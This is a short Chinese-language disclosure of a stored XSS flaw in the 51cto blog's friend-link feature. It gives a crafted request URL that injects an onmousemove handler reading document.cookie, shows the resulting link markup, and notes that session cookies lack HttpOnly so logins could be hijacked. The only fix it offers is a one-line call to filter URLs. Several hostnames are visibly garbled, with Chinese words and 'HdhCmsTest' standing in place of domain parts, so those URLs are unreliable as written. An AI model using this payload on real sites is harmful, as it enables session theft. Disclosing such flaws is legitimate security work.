友情链接过滤不严格,导致可以进行DOM结构注入。从而注入js攻击。 另外cookie重要的登录项无httponly 保护,从而可以得到其他用户的登录会话。
发生问题的地方。 增加友情链接 http://dl528888.blog.51cto测试数据/mod/edit_flink.php?type=addflink&uid=1030776&flink=HdhCmsTestiamle测试数据%22%20onmousemove=%22alert(document.cookie)%22 get参数 uid 为51tco用户id号 flink 为 构建为 HdhCmsTestiamle测试数据%22%20onmousemove=%22alert(document.cookie)%22 最后生成的dom结构是 <a href="http://HdhCmsTestiamle测试数据" onmousemove="alert(document.cookie)" "="" title="峰云,就她了。" target="_blank">峰云,就她了。</a> 当鼠标放到本链接的时候就可以弹出 cookie。 敏感cookie无httponly保护,可以直接获得。 可以钓到其他用户的登录会话,从而得到其他用户后台。
增加友情链接
http://dl528888.blog.51cto测试数据/mod/edit_flink.php?type=addflink&uid=1030776&flink=HdhCmsTest2cto测试数据%22%20onmousemove=%22alert(document.cookie)%22
增加后看dom结构
http://300421.blog.51cto测试数据/ 利用成功,可以执行任意js
发现所有cookie都没有 http only ,登录会话的铭感cookie也就没保护。
漏洞 紧急修补方案:
严格过滤网址
查看更多关于51cto博客友情链接过滤问题可以获得登录用户co的详细内容...